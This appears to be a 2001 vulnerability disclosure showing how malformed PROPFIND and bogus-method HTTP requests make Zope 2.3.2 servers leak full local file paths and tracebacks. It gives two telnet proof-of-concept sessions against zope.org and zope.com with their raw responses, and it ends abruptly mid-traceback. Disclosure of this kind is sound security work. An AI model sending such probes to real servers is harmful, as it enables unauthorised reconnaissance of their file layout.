Found vulnerability: retrieve a full path to local files in Zope.
---[ Example 1 (Linux):
telnet www.zope.org 80
PROPFIND / HTTP/1.0
F
G
H
J
K
L
HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
Sheets.py
Bobo-Exception-Type: TypeError
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
Sheets.py
Bobo-Exception-Type: TypeError
Content-Type: text/html
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//
EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML HEAD TITLEWelcome
to Zope.org/TITLE link rel=stylesheet href=http://www.zope.org/zope_css;
type=text/css /HEAD BODY B
Bobo-Exception-Line: 369
...
!--
Traceback (innermost last):
File /usr/local/base/Zope-2.3.2-modified/l
ib/python/ZPublisher/Publish.py, line 223, in publish_module
File /usr/local/ba
se/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
F
ile /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, i
n zpublisher_exception_hook
(Object: ApplicationDefaultPermissions)
File /us
r/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in
publish
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.p
y, line 160, in mapply
(Object: PROPFIND)
File /usr/local/base/Zope-2.3.2-mo
dified/lib/python/ZPublisher/Publish.py, line 112, in call_object
(Object: PR
OPFIND)
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py,
line 222, in PROPFIND
(Object: ApplicationDefaultPermissions)
File /usr/loc
al/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
Fi
le /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, i
n apply
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py,
line 219, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/d
avcmds.py, line 219, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/pyth
on/webdav/davcmds.py, line 175, in apply
File /usr/local/base/Zope-2.3.2-modifi
ed/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
(Object: Virtu
al)
TypeError: (see above)
--
Host has closed connection.
---[ Example 2 (Linux):
telnet www.zope.com 80
/ HTTP/1.0
or NOTREALCOMMAND / HTTP/1.0
HTTP/1.0 404 Not Found
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Fri, 21 Sep 2001 12:51:48 GMT
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/H
TTPResponse.py
Content-Type: text/html
Bobo-Exception-Type: NotFound
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//
EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML HEAD TITLEWelcome
to Zope.org/TITLE link rel=stylesheet href=http://www.zope.org/zope_css;
type=text/css /HEAD BODY B
Content-Length: 5845
Bobo-Exception-Line: 547
...
!--
Traceback (innermost last):
File /
usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, i
n publish_module
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher
/Publish.py, line 187, in publish
File /usr/local/base/Zope-2.3.2-modified/lib/
python/Zope/__init__.py, line 221, in zpublisher_exception_hook
(Object: Appl
icationDefaultPermissions)
File /usr/local/base/Zope-2.3.2-modified/lib/python/
ZPublisher/Publish.py, line 173, in publish
File /usr/local/base/Zope-2.3.2-mod
ified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody
File /usr/loc